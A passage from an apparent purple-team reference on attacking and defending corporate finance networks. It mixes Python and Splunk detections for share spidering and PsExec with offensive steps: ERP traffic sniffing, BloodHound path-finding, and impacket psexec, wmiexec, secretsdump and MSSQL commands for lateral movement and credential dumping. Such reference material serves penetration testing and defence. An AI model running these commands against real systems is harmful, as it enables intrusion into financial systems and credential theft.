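    base = datetime(2025, 5, 10, 9, 0, 0)
    events = []
    for i in range(150):
        events.append({"time": base + timedelta(milliseconds=250 * i), "src_ip": "10.10.30.15",
                       "ShareName": r"\\*\Finance",
                       "RelativeTargetName": f"Budgets\\FY25\\dept{i}.xlsx"})
    for i in range(12):
        events.append({"time": base + timedelta(minutes=5 * i), "src_ip": "10.10.30.20",
                       "ShareName": r"\\*\Finance",
                       "RelativeTargetName": f"Reports\\month{i}.xlsx"})
    return events


def detect_share_spidering(events, window=timedelta(minutes=5), threshold=100):
    """For every (src_ip, ShareName), slide a time window over the access events
    and record the largest number of distinct RelativeTargetName values seen in
    any window. Pairs whose peak exceeds `threshold` are returned as alerts."""
    by_key = defaultdict(list)
    for e in events:
        by_key[(e["src_ip"], e["ShareName"])].append(e)

    alerts = []
    for (ip, share), evs in by_key.items():
        evs.sort(key=lambda e: e["time"])
        in_window = Counter()  # file -> occurrences inside the current window
        start = 0
        peak, peak_at = 0, None
        for e in evs:
            in_window[e["RelativeTargetName"]] += 1
            # evict events older than `window` relative to the newest one
            while e["time"] - evs[start]["time"] > window:
                old = evs[start]["RelativeTargetName"]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            if len(in_window) > peak:
                peak, peak_at = len(in_window), evs[start]["time"]
        if peak > threshold:
            alerts.append({"src_ip": ip, "ShareName": share, "unique_files": peak,
                           "window_start": peak_at})
    return alerts


if __name__ == "__main__":
    for a in detect_share_spidering(build_sample_5145()):
        print(a)
```

Because the window is keyed on the newest event, the five-minute reader never holds more than two distinct files in view, while the spidering host peaks at all 150; the same records fed to the unbounded Splunk count would put the slow reader at twelve and the spider at 150, which still separates them here but not once the search spans a full working day.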
7. Finance Traffic Analysis — ERP Protocol Signatures
Understanding the specific protocols used by ERP systems allows for precise identification and potential interception of sensitive financial data.
7.1 ERP Traffic Table
| System | Protocol | Ports | Traffic Markers | Detection Notes |
|---|---|---|---|---|
| SAP NetWeaver (on-prem) | DIAG/SAP GUI | 3200–3299 | Large binary payloads, persistent sessions | SAP dispatcher port |
| SAP Message Server | SAP-MS | 3600, 36xx | Periodic heartbeats | Internal only |
| Oracle EBS (on-prem) | Oracle Net/TNS | 1521 | TNS listener packets | DB connection |
| Oracle Forms | Oracle Forms Listener | 9000 | Persistent connections | Legacy on-prem |
| NetSuite | HTTPS/TLS | 443 | SNI: *.netsuite.com | Always SaaS |
| Workday | HTTPS/TLS | 443 | SNI: *.workday.com | Always SaaS |
| Dynamics 365 | HTTPS/TLS | 443 | SNI: *.dynamics.com | SaaS or on-prem |
| MS Dynamics (on-prem) | HTTPS + TDS | 443, 1433 | SQL Server traffic | On-prem only |
| ADP | HTTPS/TLS | 443 | SNI: *.adp.com | SaaS payroll |
| SWIFT | HTTPS/SFTP | 443, 22 | Connections to *.swift.com | Treasury/banking |
7.2 tshark Commands for ERP Traffic Identification
# Identify SAP GUI traffic (DIAG protocol)
sudo tshark -i eth0 -f "tcp portrange 3200-3299"
# Identify Oracle TNS traffic (Database connections)
sudo tshark -i eth0 -f "tcp port 1521" -Y "tns"
# Identify SaaS ERP traffic via SNI (Workday, NetSuite, etc.)
sudo tshark -i eth0 -f "tcp port 443" -T fields -e tls.handshake.extensions_server_name | grep -E 'netsuite|workday|dynamics|adp'
# Identify SWIFT traffic: SNI only identifies the HTTPS leg (SSH carries no SNI),
# so SFTP sessions on port 22 are matched by destination address instead
sudo tshark -i eth0 -f "tcp port 443" -T fields -e tls.handshake.extensions_server_name | grep 'swift.com'
sudo tshark -i eth0 -f "tcp port 22" -T fields -e ip.dst | sort -u
OPSEC Note: 🟢 ZERO risk for passive observation.
8. Lateral Movement Paths to Finance Crown Jewels
The ultimate goal is to reach the "Crown Jewels" — the systems containing the actual financial data, such as the ERP database or the SWIFT gateway.
8.1 Crown Jewel Tiers
- Tier 1: ERP Database Servers (SAP HANA, Oracle DB, SQL Server).
- Tier 2: ERP Application Servers (SAP NetWeaver, Oracle EBS App Tier).
- Tier 3: Finance Admin Workstations & Service Accounts.
8.2 Lateral Path Visualization
sequenceDiagram
participant U as Generic User
participant FU as Finance User
participant FA as Finance Admin
participant AS as ERP App Server
participant DB as Finance DB
U->>FU: Phishing / Credential Theft
FU->>FA: Token Impersonation / GPO Abuse
FA->>AS: Admin Access (RDP/SSH)
AS->>DB: Database Connection (Service Account)
8.3 BloodHound Path Analysis
Use BloodHound to find the shortest path from your current position to the Finance Admins or ERP servers.
# Collect data from the domain
bloodhound-python -u 'user' -p 'pass' -d corp.local -dc DC_IP -c All
# Cypher Query: Find paths from all users to Finance Group
# MATCH (n:User),(m:Group {name:'FINANCE@CORP.LOCAL'}),p=shortestPath((n)-[*1..]->(m)) RETURN p
# Cypher Query: Find all users with local admin rights on ERP servers
# MATCH (u:User)-[:AdminTo]->(c:Computer) WHERE c.name =~ '(?i).*SAP.*|.*ORCL.*' RETURN u.name, c.name
8.4 Lateral Movement Techniques
Once a path is identified, use standard tools to move toward the target.
# Check for local admin rights on the ERP subnet
netexec smb 10.10.20.0/24 -u 'fin_admin' -p 'password' --local-auth 2>/dev/null | grep '(Pwn3d!)'
# Execute commands on a SAP server (requires admin)
impacket-psexec corp.local/fin_admin:password@10.10.20.50
impacket-wmiexec corp.local/fin_admin:password@10.10.20.50
# Dump credentials from a finance workstation to find service account tokens
impacket-secretsdump corp.local/fin_admin:password@10.10.20.100
# Connect to an Oracle database (Oracle EBS backend)
sqlplus system/password@//10.10.20.60:1521/ORCL
# Connect to a SQL Server database (Dynamics/ADP on-prem)
impacket-mssqlclient corp.local/svc_erp:password@10.10.20.70 -windows-auth
🔵 Blue Team Detection — Lateral Movement
| Event ID | Source | Triggered by |
|---|---|---|
| 4624 | Security | Successful logon (Type 3: Network, Type 10: RDP) |
| 4625 | Security | Failed logon |
| 4648 | Security | A logon was attempted using explicit credentials |
| 7045 | System | A service was installed in the system (PsExec) |
| 4688 | Security | A new process has been created (cmd.exe, powershell.exe) |
Splunk — Detect PsExec usage:
index=wineventlog EventCode=7045 ServiceName="PSEXESVC"
| table _time, ComputerName, ServiceName, ServiceFileName
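The 7045 search above keys on the Sysinternals service name only; other remote-execution tooling registers services under other names. This Python, added as an example and not from the original reference, keeps that match but adds the correlation an analyst otherwise does by hand: any service installed on a host shortly after a Type 3 (network) logon to that host is attributed to that logon's account and source IP and ranked by severity. Records are constructed; field names follow the Windows Security/System event fields (LogonType, IpAddress, TargetUserName, ServiceName, ServiceFileName), and the window and severity labels are assumptions.

```python
from datetime import datetime, timedelta

# Service name the Splunk search keys on (Sysinternals PsExec).
KNOWN_REMOTE_EXEC_SERVICES = {"PSEXESVC"}


def build_sample_events():
    """Constructed Security (4624) and System (7045) records, not real log data."""
    def t(h, m, s):
        return datetime(2025, 5, 10, h, m, s)
    return [
        {"EventCode": 4624, "time": t(10, 5, 1), "ComputerName": "FIN-PROD-01", "LogonType": 3,
         "TargetUserName": "fin_admin", "IpAddress": "10.10.30.15"},
        {"EventCode": 7045, "time": t(10, 5, 3), "ComputerName": "FIN-PROD-01",
         "ServiceName": "PSEXESVC", "ServiceFileName": r"%SystemRoot%\PSEXESVC.exe"},
        {"EventCode": 4624, "time": t(10, 6, 0), "ComputerName": "FIN-PROD-02", "LogonType": 3,
         "TargetUserName": "svc_deploy", "IpAddress": "10.10.1.5"},
        {"EventCode": 7045, "time": t(10, 6, 20), "ComputerName": "FIN-PROD-02",
         "ServiceName": "svcupd", "ServiceFileName": r"%SystemRoot%\svcupd.exe"},
        {"EventCode": 7045, "time": t(14, 30, 0), "ComputerName": "FIN-PROD-02",
         "ServiceName": "BackupAgent", "ServiceFileName": r"C:\Program Files\BackupAgent\agent.exe"},
    ]


def correlate_service_installs(events, window_seconds=60):
    """For each 7045, find the most recent Type 3 logon to the same host within
    `window_seconds` before the install. Severity: high if the service name is a
    known remote-exec service, medium if a network logon precedes the install,
    low otherwise (still worth a look, but usually software deployment)."""
    window = timedelta(seconds=window_seconds)
    network_logons = sorted(
        (e for e in events if e["EventCode"] == 4624 and e["LogonType"] == 3),
        key=lambda e: e["time"])
    alerts = []
    for svc in sorted((e for e in events if e["EventCode"] == 7045), key=lambda e: e["time"]):
        preceding = [l for l in network_logons
                     if l["ComputerName"] == svc["ComputerName"]
                     and timedelta(0) <= svc["time"] - l["time"] <= window]
        logon = preceding[-1] if preceding else None
        if svc["ServiceName"].upper() in KNOWN_REMOTE_EXEC_SERVICES:
            severity = "high"
        elif logon is not None:
            severity = "medium"
        else:
            severity = "low"
        alerts.append({
            "time": svc["time"], "host": svc["ComputerName"], "service": svc["ServiceName"],
            "file": svc["ServiceFileName"], "severity": severity,
            "logon_account": logon["TargetUserName"] if logon else None,
            "logon_ip": logon["IpAddress"] if logon else None,
        })
    return alerts


if __name__ == "__main__":
    for a in correlate_service_installs(build_sample_events()):
        print(f'{a["time"]:%H:%M:%S} {a["host"]} {a["service"]:<12} {a["severity"]:<6} '
              f'{a["logon_account"] or "-"} from {a["logon_ip"] or "-"}')
```

The medium tier is the one the name-based search misses entirely: a service with an unremarkable name installed twenty seconds after a network logon from a workstation is the shape a randomly named remote-execution service takes in the logs, and the correlated account and source IP are what the responder needs first.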
9. OPSEC Risk Matrix — Finance OSINT & Recon
| Technique | Risk | Network Signature | Target Sees | Detection Method |
|---|---|---|---|---|
| Passive OSINT (crt.sh, Shodan, SEC/EDGAR) | 🟢 ZERO | None | Nothing | N/A |
| Google Dorking | 🟢 ZERO | None | Nothing | N/A |
| Subdomain enum (subfinder passive) | 🟢 LOW | None | Nothing | N/A |
| httpx tech fingerprinting | 🟡 LOW-MED | HTTP GET/HEAD requests | Web requests from your IP | WAF / Access Logs |
| Direct TLS cert grab | 🟡 MEDIUM | TLS Handshake | Connection to port 443 | Firewall / IDS |
| tcpdump passive sniffing | 🟢 ZERO | None | Nothing | N/A |
| Responder -A mode | 🟢 LOW | None | Nothing | N/A |
| Anonymous LDAP bind | 🟡 LOW-MED | LDAP Bind Request | Anonymous connection to DC | DC Event Logs |
| Authenticated LDAP bulk query | 🟠 MED-HIGH | Multiple LDAP Search Requests | Bulk data retrieval | Event ID 1644 |
| SMB share listing | 🟡 MEDIUM | SMB Tree Connect | Connection to port 445 | Event ID 5140 |
| SMB share spidering | 🔴 HIGH | Rapid file access | High volume of SMB traffic | Event ID 5145 |
| BloodHound collection | 🔴 HIGH | Bulk LDAP + SMB queries | Massive AD enumeration | SIEM Correlation |
| PsExec to ERP server | 🔴 VERY HIGH | Service installation + RPC | Remote command execution | Event ID 7045 |
10. Quick Reference — Finance OSINT & Recon Commands
Phase 1: Passive External
# Subdomains from CT logs
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | sort -u
# Shodan org search
shodan search org:"Target Corp"
Phase 2: Semi-Passive
# Tech fingerprinting
subfinder -d target.com -silent | httpx -td -title
Phase 4: Internal Passive
# Passive sniffing
sudo tcpdump -i eth0 -w capture.pcap
# SNI harvesting
tshark -r capture.pcap -Y "tls.handshake.extensions_server_name" -T fields -e tls.handshake.extensions_server_name | sort -u
Phase 5: Internal AD/LDAP
# Finance group search
ldapsearch -x -H ldap://DC_IP -b 'dc=corp,dc=local' '(cn=*Finance*)'
Phase 6: Internal OSINT
# SMB share list
netexec smb 10.10.10.0/24 -u 'user' -p 'pass' --shares
Phase 8: Lateral Movement
# BloodHound
bloodhound-python -u 'user' -p 'pass' -d corp.local -dc DC_IP -c All
# MSSQL Access
impacket-mssqlclient corp.local/user:pass@10.10.20.70 -windows-auth